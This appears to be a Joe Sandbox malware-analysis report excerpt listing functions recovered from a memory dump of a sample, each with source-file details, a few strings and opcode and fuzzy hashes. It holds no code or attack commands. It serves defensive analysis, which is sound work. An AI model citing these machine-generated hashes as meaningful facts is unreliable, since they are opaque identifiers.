                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: MUI
                                                                                                                                      • API String ID: 0-1339004836
                                                                                                                                      • Opcode ID: 9c534096d770fe82b93b297d0f0230b603139153f94698d1acbebd6a3b509e01
                                                                                                                                      • Instruction ID: e12b80ba3914070a68aba52c662449f4014d2c91e7b6dc57a5119fa5f7b1fc94
                                                                                                                                      • Opcode Fuzzy Hash: 9c534096d770fe82b93b297d0f0230b603139153f94698d1acbebd6a3b509e01
                                                                                                                                      • Instruction Fuzzy Hash: 8B826E75E0021A8FDB24CFA9CA82BEDB7B5BF48710F14816DE859AB290D7349D41EF50
                                                                                                                                      Function 01046420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                      • Opcode ID: 1031662f8166bef555a2321829cf2f82fd093a312e556781b5696bad13f27227
                                                                                                                                      • Instruction ID: 4dbc7b38043716b64555c8e7e277798fa09b6f76c392547afe4af55d1a9c82cf
                                                                                                                                      • Opcode Fuzzy Hash: 1031662f8166bef555a2321829cf2f82fd093a312e556781b5696bad13f27227
                                                                                                                                      • Instruction Fuzzy Hash: 289161B1A00219AFEB21DF95CC85FAE7BB9EF49B50F140065F600AB191E775AD00DBA0
                                                                                                                                      Function 0106E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 0-3916222277
                                                                                                                                      • Opcode ID: 35ceff7239a33bd164e43c6d9a48402293efaa1996ab4b7856415089b1299b34
                                                                                                                                      • Instruction ID: 2cd3790ffda19975f9a0f64c679b14375d0693e091a723542dbd43c8d747c43f
                                                                                                                                      • Opcode Fuzzy Hash: 35ceff7239a33bd164e43c6d9a48402293efaa1996ab4b7856415089b1299b34
                                                                                                                                      • Instruction Fuzzy Hash: C491BE75900609AEDB22EFA4DC44FEFBBBEEF85740F100029F640AB251DB399901DB90
                                                                                                                                      Function 00FFA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: GlobalTags
                                                                                                                                      • API String ID: 0-1106856819
                                                                                                                                      • Opcode ID: 7401b7c972a486c881a08c691977856b344e057002df5a45de99946b6994f0e5
                                                                                                                                      • Instruction ID: b0e9986ad3a4a5b77f5c2d4e85f0c037eddeb815ba8441f164f4f3d033e2d973
                                                                                                                                      • Opcode Fuzzy Hash: 7401b7c972a486c881a08c691977856b344e057002df5a45de99946b6994f0e5
                                                                                                                                      • Instruction Fuzzy Hash: DB719EB5E0020AAFDF69CF98C5906EDBBF5BF88710F14816AE585A7241E7768A01CB50
                                                                                                                                      Function 01064978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .mui
                                                                                                                                      • API String ID: 0-1199573805
                                                                                                                                      • Opcode ID: c5fd42254bb8534369e4140b4704b935d007ad43c84b852fa5f420aa8228e3c4
                                                                                                                                      • Instruction ID: 44f63c81f60777b05453b51eed631401cbb4cfc0db061e485efef62d306d1110
                                                                                                                                      • Opcode Fuzzy Hash: c5fd42254bb8534369e4140b4704b935d007ad43c84b852fa5f420aa8228e3c4
                                                                                                                                      • Instruction Fuzzy Hash: CD51A372D00229ABDF15DF99D940AAEBBB9EF04B14F05416AFA51FB240D7389D01CBA4
                                                                                                                                      Function 00FDE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: EXT-
                                                                                                                                      • API String ID: 0-1948896318
                                                                                                                                      • Opcode ID: 6cbdca698f43a22d678cb92686551d6a99f4522f32aa1936f7a0e22e2d3b8e6a
                                                                                                                                      • Instruction ID: 0d77fc98555e311e833b2f8c69e82677f6c1cd12bc227b169bc0fafe3a39fa4d
                                                                                                                                      • Opcode Fuzzy Hash: 6cbdca698f43a22d678cb92686551d6a99f4522f32aa1936f7a0e22e2d3b8e6a
                                                                                                                                      • Instruction Fuzzy Hash: 7241B3729083129BD710EB75CC41B6BB7E9AF88B14F48092EF594DB280E678D904E793
                                                                                                                                      Function 0103C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: BinaryHash
                                                                                                                                      • API String ID: 0-2202222882
                                                                                                                                      • Opcode ID: 33db402706157ed7ee83985453f76c5d26c0de1fe536afb847510fb532b60ac1
                                                                                                                                      • Instruction ID: 3c839d1be9fa72e7f1e88093485b5c40d73105f77d538bbe23a0d0c0d2c85061
                                                                                                                                      • Opcode Fuzzy Hash: 33db402706157ed7ee83985453f76c5d26c0de1fe536afb847510fb532b60ac1
                                                                                                                                      • Instruction Fuzzy Hash: 224121B1D0052DABEB21DB50CD84FDEB77CAB45714F0045A6AB48BB181DB709F898FA4
                                                                                                                                      Function 01056B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #
                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                      • Opcode ID: 0f8f8bd5d48be64811cbff84e57be8ba39bf7f533be7951ba9346d38374c42e0
                                                                                                                                      • Instruction ID: 16295aa5fb0355eb612c6c7180d33b617a06fc15bdab80f2bd43652e3e155a29
                                                                                                                                      • Opcode Fuzzy Hash: 0f8f8bd5d48be64811cbff84e57be8ba39bf7f533be7951ba9346d38374c42e0
                                                                                                                                      • Instruction Fuzzy Hash: 89310931A0070D9BEB62DB69C850BFF7BE8DF44704F944068EE81AB282C776E905CB50
                                                                                                                                      Function 0103CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: BinaryName
                                                                                                                                      • API String ID: 0-215506332
                                                                                                                                      • Opcode ID: 2c50793f18289c4e9de3b58d3f966902e25243d2faca15945d1e3e075175768e
                                                                                                                                      • Instruction ID: e8bd56408d4156a97958ed399c175d0680a12bea19cca0a23658dc61f7ced28d
                                                                                                                                      • Opcode Fuzzy Hash: 2c50793f18289c4e9de3b58d3f966902e25243d2faca15945d1e3e075175768e
                                                                                                                                      • Instruction Fuzzy Hash: 34310536900515AFFB1ADB59CA45EAFBBB8EBC0750F01416AA941F7251D7309E00D7E0
                                                                                                                                      Function 0104892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0104895E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                      • API String ID: 0-702105204
                                                                                                                                      • Opcode ID: e82f13e3bb85468b4ada897f4b254e024ef309a7835910ef9bf334b89403a915
                                                                                                                                      • Instruction ID: e67d5e2b52f6d1d93cbf06535e333aae06f0c474fc095f187cec61d3fb3519e1
                                                                                                                                      • Opcode Fuzzy Hash: e82f13e3bb85468b4ada897f4b254e024ef309a7835910ef9bf334b89403a915
                                                                                                                                      • Instruction Fuzzy Hash: 7D0147F5200A019FE6296F95CCC4E9A7BA5EF86354B0C087EF7C106152CB25AC40C792
                                                                                                                                      Function 01062000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1746bd18e9c3bf201c1a0d1df317843f8b2ff6904263e813e92084c80c791e5c
                                                                                                                                      • Instruction ID: db4ae3c79c8e3541588089ed535fbf47dfd6b6f93b25a2dcee0aabf875b83330
                                                                                                                                      • Opcode Fuzzy Hash: 1746bd18e9c3bf201c1a0d1df317843f8b2ff6904263e813e92084c80c791e5c
                                                                                                                                      • Instruction Fuzzy Hash: 164203326083419FE765CF68C890A6FBBE9BF88700F08496EFAC297251D735D945CB52
                                                                                                                                      Function 01058158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 237cb6b4dc0aa9ddb8317b4f654496c65f2c5f108f753516d14e2e46fa7942ac
                                                                                                                                      • Instruction ID: 52c02bf66eab339946c3f2da9796b7a046ff09d105f6123cd58083767e7f855c
                                                                                                                                      • Opcode Fuzzy Hash: 237cb6b4dc0aa9ddb8317b4f654496c65f2c5f108f753516d14e2e46fa7942ac
                                                                                                                                      • Instruction Fuzzy Hash: 96424075A002198FEB65CF69C841BAEBBF5BF48300F14C19AED89EB242D7349985CF50
                                                                                                                                      Function 00FD2840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ded315c6141490880c8cba7517edd853adddb22fe88f5e5c7e880b35820dc999
                                                                                                                                      • Instruction ID: 771b37f152331271c329fc9c7b73ed705918594ded19e3ef5306b95bb5c9c368
                                                                                                                                      • Opcode Fuzzy Hash: ded315c6141490880c8cba7517edd853adddb22fe88f5e5c7e880b35820dc999
                                                                                                                                      • Instruction Fuzzy Hash: 6C32EF70A007658BDB65CF69C8547BEBBF2BF84304F24415ED8C69B385DB76A802DB90
                                                                                                                                      Function 0106A118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d44ee9eab25fdc878ee0be5e87340e85efc53f4df7a26d800f65cd77a5bef365
                                                                                                                                      • Instruction ID: 0cdf62b2a10b12d7a60ff3202ce11325a646aa74d9722b0b45cc0bab2cf69d93
                                                                                                                                      • Opcode Fuzzy Hash: d44ee9eab25fdc878ee0be5e87340e85efc53f4df7a26d800f65cd77a5bef365
                                                                                                                                      • Instruction Fuzzy Hash: C522BF70704661CBEB65EF2DC490376BBE9BF45300F088499E9C6AF286D739E951CB60
                                                                                                                                      Function 00FC6A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6d82babeb80e638b913bc749d196fab7cf5ca4a4888716f758870aaa2aef4833
                                                                                                                                      • Instruction ID: 3a91861fea0e0fbc68a7d22e1549a93a547aa865998f31ef4c08a71d407afb36
                                                                                                                                      • Opcode Fuzzy Hash: 6d82babeb80e638b913bc749d196fab7cf5ca4a4888716f758870aaa2aef4833
                                                                                                                                      • Instruction Fuzzy Hash: 6E327D75A04215CFDB25CF68C580BAAB7F1FF48310F24856AE996EB391DB34AC41DB90
                                                                                                                                      Function 00FE4A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                      • Instruction ID: 763689f92b0fe30888927d1cf175e5075e0f7f2badd813e85224afc34ba34768
                                                                                                                                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                      • Instruction Fuzzy Hash: CEF19171E012599BDB24CF9AC980BAEB7F5BF48710F18816DE945AB340E774EC41DB50
                                                                                                                                      Function 0105892B Relevance: .4, Instructions: 386COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ac4538d4b96f0770ef6af73591c91e089bea7d94e1b15d12d393d17ba8a1cb9d
                                                                                                                                      • Instruction ID: ee0548c4bbf86905edbf36cbbae7d6a001d7971786d886956e85a633dd402ca4
                                                                                                                                      • Opcode Fuzzy Hash: ac4538d4b96f0770ef6af73591c91e089bea7d94e1b15d12d393d17ba8a1cb9d
                                                                                                                                      • Instruction Fuzzy Hash: 99D1D171A006098BEF95CF5AC841AFFBBF5AF88304F18C16ADD95A7241E735E9058B60
                                                                                                                                      Function 00FC65D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fddf1c7f8f836c95a3bece60d171593c0fa13496df8b08d244ff1b8f6f26350c
                                                                                                                                      • Instruction ID: fbd453139d6abe2b05abe7bce1db4a291ee0fbc980a938a91584ac2016d212a0
                                                                                                                                      • Opcode Fuzzy Hash: fddf1c7f8f836c95a3bece60d171593c0fa13496df8b08d244ff1b8f6f26350c
                                                                                                                                      • Instruction Fuzzy Hash: 7DE19C719083428FC714CF28C580B6ABBE1FF99318F148A6DE999CB351DB31E905DB92
                                                                                                                                      Function 00FB8397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 134e5e3f64928b6c53640cd47c2fa13cff6013d50f0e79655454e60e682e5f79
                                                                                                                                      • Instruction ID: 543de5e7183ab4e9ec01add651c99ba769546957419a17184d47c1beebbdc4cd
                                                                                                                                      • Opcode Fuzzy Hash: 134e5e3f64928b6c53640cd47c2fa13cff6013d50f0e79655454e60e682e5f79
                                                                                                                                      • Instruction Fuzzy Hash: BFD1D172A002069BCB14DF66CC81BFA77B9AF94358F244629F951DB281EF38D942DB50
                                                                                                                                      Function 01048243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                      • Instruction ID: f7d740a1e06b5d97935c6b9be9da649a15586bcede0431774bd9725e281d90d0
                                                                                                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                      • Instruction Fuzzy Hash: D6B145B4A00605AFDB64DFD5C980AAFBBF9BF84304F14887FAA8197751DA34E905CB10
                                                                                                                                      Function 00FD0535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                      • Instruction ID: 532a91155ee1d0f116c7371f8979a8bb7661dcc9b151ae954a0b1ba3a9f8ba55
                                                                                                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                      • Instruction Fuzzy Hash: FFB1D731600655AFDB15DB68CC90BBEBBF6AF84300F1841A6E592DB381DB34EE41EB50
                                                                                                                                      Function 00FC83C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5d818c1e75cbc001e27b12677f58d17201e5f95277f8aaaa61e204062b2901f6
                                                                                                                                      • Instruction ID: a5f7a68ede6ae45e99a0b773cb91eb1975d49f4dc10d6edb8ebbbec8ac3b0f03
                                                                                                                                      • Opcode Fuzzy Hash: 5d818c1e75cbc001e27b12677f58d17201e5f95277f8aaaa61e204062b2901f6
                                                                                                                                      • Instruction Fuzzy Hash: DBC18874608341CFE764CF18C485BABB7E5BF88344F44496EE98987291DBB4E909CF92
                                                                                                                                      Function 00FBC427 Relevance: .3, Instructions: 280COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 420acdbe861cc5e1660de038294d70df2066cf182cb6e50c6a4512894923f3b4
                                                                                                                                      • Instruction ID: dc3f6d5a657db890e8bdadcf06dcdc171b92826392bf9739649a3f6a2836eeb4
                                                                                                                                      • Opcode Fuzzy Hash: 420acdbe861cc5e1660de038294d70df2066cf182cb6e50c6a4512894923f3b4
                                                                                                                                      • Instruction Fuzzy Hash: 56B18170B002658BDB75CF55C890BEAB3F1AF44710F1485EAE54AE7281EB34AD85DF60
                                                                                                                                      Function 00FEE5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1f844049d0f97a41d463f5b0062f0022a19b6f54e9bae2689106ea22879ce302
                                                                                                                                      • Instruction ID: 894c471b36b0581131a8130ee20478d05a8d7f4b78f38a2a68e5eead8763d899
                                                                                                                                      • Opcode Fuzzy Hash: 1f844049d0f97a41d463f5b0062f0022a19b6f54e9bae2689106ea22879ce302
                                                                                                                                      • Instruction Fuzzy Hash: 26A17831E006AA9FEB22DB59D944FEEBBF4AF00750F140161EA90AB2D1C7789D40DBC1
                                                                                                                                      Function 01000185 Relevance: .3, Instructions: 276COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: dd7234307f151c3a39abf6c732e171ffef5b5b496f5e0c74343a8c1b0f86de0a
                                                                                                                                      • Instruction ID: 369dca4ac607c436e6b071631fb1dc6ba0dbf9b039e745f9137750385efb3de1
                                                                                                                                      • Opcode Fuzzy Hash: dd7234307f151c3a39abf6c732e171ffef5b5b496f5e0c74343a8c1b0f86de0a
                                                                                                                                      • Instruction Fuzzy Hash: 58A101B0B016169BEB26CF69C990BAAB7F4FF44344F004029FA85972C6DB74E805DB40
                                                                                                                                      Function 01094500 Relevance: .3, Instructions: 275COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ad115bf7a7b79be3730ad7784b4bb81e64458621ab5245eab1fae673a59c97c3
                                                                                                                                      • Instruction ID: 0389e79a470454fcc0ea05486b1de5c4d283e1774da4077b8226cbd492d1908b
                                                                                                                                      • Opcode Fuzzy Hash: ad115bf7a7b79be3730ad7784b4bb81e64458621ab5245eab1fae673a59c97c3
                                                                                                                                      • Instruction Fuzzy Hash: D1A1ED72A10601AFCB22DF18CA90B5AB7E9FF48704F450569F585DB751C738ED02DB91
                                                                                                                                      Function 01092B57 Relevance: .3, Instructions: 266COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                      • Instruction ID: 86fa7deaf1f8fce7a39ef8ace3662f33ed294fccaa4645009b6673a42f409fa0
                                                                                                                                      • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                      • Instruction Fuzzy Hash: 41B169B1E0061AEFDF59DFA8C890AADBBF5FF48300F148169E954AB351D730A941DB90
                                                                                                                                      Function 010460E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
